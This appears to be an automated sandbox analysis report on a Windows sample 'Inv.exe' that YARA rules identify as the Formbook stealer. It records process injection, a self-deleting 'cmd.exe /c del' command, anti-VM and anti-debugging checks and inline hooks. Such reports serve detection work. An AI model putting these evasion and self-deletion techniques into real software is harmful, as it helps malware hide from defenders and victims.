Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@8/0@7/3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
Source: C:\Users\user\Desktop\Inv.exe Command line argument: Kernel32.dll 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: IEUCIZEO 0_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: Kernel32.dll 1_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 1_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: User32.dll 1_2_01231040
Source: C:\Users\user\Desktop\Inv.exe Command line argument: IEUCIZEO 1_2_01231040
Source: Inv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Inv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Inv.exe Virustotal: Detection: 39%
Source: Inv.exe ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\Inv.exe File read: C:\Users\user\Desktop\Inv.exe
Source: unknown Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: unknown Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: unknown Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Inv.exe Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe'
Source: Inv.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Inv.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_012391A5 push ecx; ret 0_2_012391B8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D0D2 push eax; ret 1_2_0041D0D8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D0DB push eax; ret 1_2_0041D142
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D085 push eax; ret 1_2_0041D0D8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D13C push eax; ret 1_2_0041D142
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041D1EF push ebp; ret 1_2_0041D6FD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0040F345 push edi; retf 1_2_0040F34C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041E7C6 push edx; ret 1_2_0041E83E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_012391A5 push ecx; ret 1_2_012391B8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0199D0D1 push ecx; ret 1_2_0199D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E6D0D1 push ecx; ret 4_2_02E6D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D085 push eax; ret 4_2_0036D0D8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D0D2 push eax; ret 4_2_0036D0D8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D0DB push eax; ret 4_2_0036D142
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D13C push eax; ret 4_2_0036D142
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036D1EF push ebp; ret 4_2_0036D6FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036DA9F push cs; iretd 4_2_0036DAAE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0035F345 push edi; retf 4_2_0035F34C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036E7C6 push edx; ret 4_2_0036E83E

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Inv.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Inv.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 00000000003598E4 second address: 00000000003598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE RDTSC instruction interceptor: First address: 0000000000359B5E second address: 0000000000359B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6700 Thread sleep count: 65 > 30
Source: C:\Windows\explorer.exe TID: 6700 Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6576 Thread sleep time: -86000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: explorer.exe, 00000002.00000000.690270641.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.686106576.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000002.1056063670.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.690969786.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000002.00000002.1062140543.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Inv.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Inv.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0040ACD0 LdrLoadDll, 1_2_0040ACD0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01241B13 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_01241B13
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01236A00 mov eax, dword ptr fs:[00000030h] 0_2_01236A00
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073E912 mov eax, dword ptr fs:[00000030h] 0_2_0073E912
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F1BE mov eax, dword ptr fs:[00000030h] 0_2_0073F1BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F181 mov eax, dword ptr fs:[00000030h] 0_2_0073F181
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F221 mov eax, dword ptr fs:[00000030h] 0_2_0073F221
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0073F369 mov eax, dword ptr fs:[00000030h] 0_2_0073F369
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01236A00 mov eax, dword ptr fs:[00000030h] 1_2_01236A00
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972990 mov eax, dword ptr fs:[00000030h] 1_2_01972990
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A185 mov eax, dword ptr fs:[00000030h] 1_2_0197A185
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196C182 mov eax, dword ptr fs:[00000030h] 1_2_0196C182
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C51BE mov eax, dword ptr fs:[00000030h] 1_2_019C51BE
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h] 1_2_019761A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019761A0 mov eax, dword ptr fs:[00000030h] 1_2_019761A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C69A6 mov eax, dword ptr fs:[00000030h] 1_2_019C69A6
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0194B1E1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0194B1E1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B1E1 mov eax, dword ptr fs:[00000030h] 1_2_0194B1E1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019D41E8 mov eax, dword ptr fs:[00000030h] 1_2_019D41E8
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] 1_2_01949100
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] 1_2_01949100
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949100 mov eax, dword ptr fs:[00000030h] 1_2_01949100
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197513A mov eax, dword ptr fs:[00000030h] 1_2_0197513A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197513A mov eax, dword ptr fs:[00000030h] 1_2_0197513A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov eax, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01964120 mov ecx, dword ptr fs:[00000030h] 1_2_01964120
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h] 1_2_0196B944
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196B944 mov eax, dword ptr fs:[00000030h] 1_2_0196B944
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h] 1_2_0194B171
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194B171 mov eax, dword ptr fs:[00000030h] 1_2_0194B171
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194C962 mov eax, dword ptr fs:[00000030h] 1_2_0194C962
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949080 mov eax, dword ptr fs:[00000030h] 1_2_01949080
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h] 1_2_019C3884
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C3884 mov eax, dword ptr fs:[00000030h] 1_2_019C3884
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0197F0BF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h] 1_2_0197F0BF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197F0BF mov eax, dword ptr fs:[00000030h] 1_2_0197F0BF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019890AF mov eax, dword ptr fs:[00000030h] 1_2_019890AF
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019720A0 mov eax, dword ptr fs:[00000030h] 1_2_019720A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov ecx, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DB8D0 mov eax, dword ptr fs:[00000030h] 1_2_019DB8D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019458EC mov eax, dword ptr fs:[00000030h] 1_2_019458EC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] 1_2_019C7016
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] 1_2_019C7016
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7016 mov eax, dword ptr fs:[00000030h] 1_2_019C7016
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h] 1_2_01A14015
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A14015 mov eax, dword ptr fs:[00000030h] 1_2_01A14015
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197002D mov eax, dword ptr fs:[00000030h] 1_2_0197002D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195B02A mov eax, dword ptr fs:[00000030h] 1_2_0195B02A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01960050 mov eax, dword ptr fs:[00000030h] 1_2_01960050
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01960050 mov eax, dword ptr fs:[00000030h] 1_2_01960050
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A02073 mov eax, dword ptr fs:[00000030h] 1_2_01A02073
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A11074 mov eax, dword ptr fs:[00000030h] 1_2_01A11074
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972397 mov eax, dword ptr fs:[00000030h] 1_2_01972397
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A15BA5 mov eax, dword ptr fs:[00000030h] 1_2_01A15BA5
